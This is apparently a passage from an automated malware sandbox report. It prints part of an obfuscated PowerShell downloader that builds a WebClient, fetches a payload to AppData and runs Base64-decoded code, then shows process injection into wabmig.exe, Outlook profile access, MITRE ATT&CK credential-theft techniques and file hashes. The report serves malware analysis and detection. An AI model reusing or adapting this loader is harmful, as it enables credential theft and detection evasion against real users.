uldoLit,itS ileoG sfocAtheroegnsplWilliTOmklayNuancpPrekneisrae]Eng.n:S,riv:SlackTRoys,lepidesInme,1 Re.b2Galva ');$Trekantdramaers12=$Catel[0];$Tsutsutsi= (Skovsanger 'Staa $Ce trGscabel.udesO Im.ebIsabea TilslKanal: elloROnk,eo,elegn TrouK odmaeVirksdThingO ountrIm,taS Stud=Su.erNFjer E IsocwSkrve-S rghoYo hubSus ejIsoceE voucCAudietNon l UndersHookuyMaskes TempTFjel,E lesmCavet. magN FejlECask T vejr. FurbwHelinePot ubSubagc Al.ulc ntrI Af eEAmat,NOverdt');$Tsutsutsi+=$Timelofterne[1];Wined ($Tsutsutsi);Wined (Skovsanger 'Binom$ UdserInfero ChinnScrubkRa doeToye dKroneo BundrHoydasFinge.Theo HP osteshortaCir ud raa eS allrst,rrsClea [Feltp$dis,oAF ilurDeltrb K tieBambujEposedEyebae forlr GofffHeropa V tfm reyiLyskolOverdiThoreeDi.tr]Krvel=Pro.e$ nvoiTInexcr ,irkuSomatcFaileuSkattlThiodeGlyconFortytMeta n .ncee NedfsSper,s Er v ');$adumbrating=Skovsanger ' Farm$ heemrStakaoAutoknRntgek ilkeePu hidSjusso L ngr Bo gs chro. SheiDSkopuoIrregw Almin Antil Funko TempaStjerd AlloFCleuciSwashlProdueAnbra(Antel$ RubbTUmorsrBenzoeF xnuk issa BalinHighpt IntedF rvar AffiaUndepmH,rmia FataeIsolarNeurasretun1Spejl2Pyrrh,I,sti$ versCMisy aEdentsUkuletunimaiLaetslRentriHinduaCadisn TapesSverikDecer)Andag ';$Castiliansk=$Timelofterne[0];Wined (Skovsanger 'Nedsk$ KoblG W,nrlColonOFixedB BureaevolulEvolv:Desinn atirOSpindNP ykoOFe ryc SvinCPro auS.btlP PeteAPreconOvergcPlagieT.ves= Fl l( UnprTGumpee Br gS QuarTBeeme-CoproP FlecaGazint darwHUnslu S.st$R.tuaCOve sAEldonsFetatT PariIHjrneLs.julikortba AfslN Tamps LejlkHydra)Jaukn ');while (!$Nonoccupance) {Wined (Skovsanger 'Bloc,$Zin kgPag tlO,erfoPastibOstraasommalGol e: Bl nPFusere La.rrA,ertiOp oskBeachuParkamS mbaeLuxurnResatsTeate=Galjo$TrkkotKolacrSko suUdseeeIndfa ') ;Wined $adumbrating;Wined (Skovsanger 'PolleS KonttFerieaPapporG avht Appe-FuskeS DianlblackeLiv feUnimppklker Komm4 cale ');Wined (Skovsanger 'Udski$Keenag AnellLanghoMorribVandfaTeatrl C pi:Re,igNSylt oAmninn TidsoMyxovc agecBlathuAppospStoffaHardwn StaacKil weSk.le=Naadi(AgeusTFeldieMegadsIndhot Klde-BssekPh rrea,ekantO eishEnh d .olke$HoffmC Pr sa Atoms LysttMcneiiInstrlLsrivioclocaForstnstrdesAbstikIncon)Ek ek ') ;Wined (Skovsanger 'Pr nt$Vaco,gLeucolGrueloBortlb ypopaCordolSteph:UndefNApophoUnsh nTangeoFolkebPolycsmaaneeManomrHutiavDo,siaOverlnBar.ecGenaneGgesksRatsb=Reco.$.ryllgKedellVerdeoDialibProtoaKindtl anm:FortiPriferr UvejeLaartd Fol.iTilkasUnpercSukkerResteiSo,tim Rat iSaaninSynera UafstD bbee.rimmdBlind7Handm7Inte +Fa ou+Minis% Flyv$ no.tCKludgaDefrot Brite Clegl Kore.Hyp.pc esuoAftllu Svign StattAp co ') ;$Trekantdramaers12=$Catel[$Nonobservances];}$Abdaria=298727;$Detinet=29520;Wined (Skovsanger 'Styrt$UncifgRevollb.lleoBhadobR deraUdvallFarms: ondiHantecvOvermi Fortd ,nivbNedrigPostke For r Ordb Salm=jules Ch orG CymbeAshietUntil-BelugC BundoAmph.nPaatet,iscoe SammnFortats ott Sculp$ onprCPopolaPrkensLuft tstolpi For.l TraniRigd aUnd rnEternsPh lokSiden ');Wined (Skovsanger 'F erc$AcrosgMak olrensko.ortebE straShapalInlym:ForhaUNicomn Chylcre leoK edidHenredBillelDispee Ht edMil s Ta ke=Ewryb arth[Povl.SWe ghyRerousHal,ttAmphieReglemVit l. CompCSkem o tr rn edrv Fe deDrainrForgltKamuf] Biot:Cursu: SyneF SkatrSn.seo D.anm ha.eBU.creaZestis QuipeCabal6Mycos4 FonoSIc.notPhonorKalveibillin C.opgDe os(aceto$Dyea H SkrmvConnii VetedOpholb AdelgF rvaeMagnerSpag.)Pren. ');Wined (Skovsanger 'Randi$ ofteg RedelEmagroSquibb Gldsa delslbozal:Hvl eCRappeiBestyr adj c IndsuBrn pmItch,sKir bc WillrBomb i.ovtwvSkafte Houh Forre=Poisu Cirke[pola S b,gsysvej sRa grt Evape Afk mWoode.panhaT kineFors x.ookit Dump.GlemmEbebudnReclic ZeosoRustldMediciAlkenn skatgBerap] Nona:Debla:,emerABrac,S BestC opcaIBacksIBetwe.UlushGBaetyeKatabtUnscaS OmsttTraphr mphijoinin .empgSk ks(epiku$ForeoUH,mozn rrkncBestrooystcd Hr,pd ,ibilRepubeG ocedArmbr) Pla, ');Wined (Skovsanger ',iutl$InstrgGi.oelD.sgro,arfubGingiaNysnvl rchm:Dep sA.hytodPinbauJulemmHaemobCali,rNonfeaOffentHaglbi Datao Kis n Koalstoot =Lynak$SpiraCOverciAmmedrProgrcUnsaluRo.tem UnresV,rdecC rberD rehi.wangv.ibrseBilbo.CompusUn.oquKen,abTalsts BeratSwandrTotaliEjdamnAdskigHjemk(Regob$IrideACa onbPr grdOlympa vlstrWadmaiMounda Soll, uckh$Zig,aD Renle Herrt R.beiSturdnsbeboePunilt urus)Subto ');Wined $Adumbrations;"
      4⤵
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      Suspicious behavior: CmdExeWriteProcessMemorySpam
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: MapViewOfSection
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2592
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Alvildes.Scy && echo t"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1684
    - - C:\Program Files (x86)\windows mail\wabmig.exe
        
        "C:\Program Files (x86)\windows mail\wabmig.exe"
        5⤵
        Accesses Microsoft Outlook profiles
        Suspicious use of NtCreateThreadExHideFromDebugger
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        outlook_office_path
        outlook_win_path
        
        PID:3044

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Credentials from Password Stores

1

T1555

Credentials from Web Browsers

1

T1555.003

Discovery

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Email Collection

1

T1114

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Alvildes.Scy

Filesize
427KB

MD5
2e657763f33de5fb5312b56539651192

SHA1
be646a64dbc03990074f938879b49df064eb82f3

SHA256
d684e7ad8a8ad72c2b2b2c107aaf8674102aea6fcffdfc6487894b5e3e457bc7

SHA512
2903a39196c0c2942d7d2b72d67dbc35532de96acd5121577ad3a29470247477b32bcec1c5f3f4d8b1fdcf2824014a52e99948783a635fa6cdd4592a6f82269d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-457978338-2990298471-2379561640-1000\0f5007522459c86e95ffcc62f32308f1_7ab03691-fc7c-4787-903d-423aed4b9dc2

Filesize
46B

MD5
d898504a722bff1524134c6ab6a5eaa5

SHA1
e0fdc90c2ca2a0219c99d2758e68c18875a3e11e

SHA256
878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9

SHA512
26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-457978338-2990298471-2379561640-1000\0f5007522459c86e95ffcc62f32308f1_7ab03691-fc7c-4787-903d-423aed4b9dc2

Filesize
46B

MD5
c07225d4e7d01d31042965f048728a0a

SHA1
69d70b340fd9f44c89adb9a2278df84faa9906b7

SHA256
8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a

SHA512
23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\YOKYX8WKJQRU7AP8XQ7U.temp

Filesize
7KB

MD5
48a3c84e0d3b62ddefbef634f838095f

SHA1
b37ca131735545923c281e7a9cbace0e115147d7

SHA256
b293bdde9c489a59597ad381e3af3340d51837f738fa20341c7ebafe31c1bcdf

SHA512
02e85d834fa93647e070ea286bf0e4c554c27269f3f470e046f2d10fff0306ce66b1b3fd097204a2d0d90090b25c32b9ca1bc9f76c3c96fb9ee02651515610d1

Download Submit
memory/2592-20-0x0000000006360000-0x0000000007617000-memory.dmp

Filesize
18.7MB

Download
memory/2692-8-0x000007FEF5DC0000-0x000007FEF675D000-memory.dmp

Filesize
9.6MB

Download
memory/2692-4-0x000007FEF607E000-0x000007FEF607F000-memory.dmp

Filesize
4KB

Download
memory/2692-11-0x000007FEF5DC0000-0x000007FEF675D000-memory.dmp

Filesize
9.6MB

Download
memory/2692-13-0x000007FEF5DC0000-0x000007FEF675D000-memory.dmp

Filesize
9.6MB

Download
memory/2692-14-0x000007FEF607E000-0x000007FEF607F000-memory.dmp

Filesize
4KB

Download
memory/2692-15-0x000007FEF5DC0000-0x000007FEF675D000-memory.dmp

Filesize
9.6MB

Download
memory/2692-9-0x000007FEF5DC0000-0x000007FEF675D000-memory.dmp

Filesize
9.6MB

Download
memory/2692-10-0x000007FEF5DC0000-0x000007FEF675D000-memory.dmp

Filesize
9.6MB

Download
memory/2692-7-0x000007FEF5DC0000-0x000007FEF675D000-memory.dmp

Filesize
9.6MB

Download
memory/2692-5-0x000000001B2F0000-0x000000001B5D2000-memory.dmp

Filesize
2.9MB

Download
memory/2692-6-0x0000000002010000-0x0000000002018000-memory.dmp

Filesize
32KB

Download
memory/2692-46-0x000007FEF5DC0000-0x000007FEF675D000-memory.dmp

Filesize
9.6MB

Download
memory/3044-45-0x0000000000EB0000-0x0000000002167000-memory.dmp

Filesize
18.7MB

Download
memory/3044-22-0x0000000000EB0000-0x0000000002167000-memory.dmp

Filesize
18.7MB

Download

Analysis

Sharing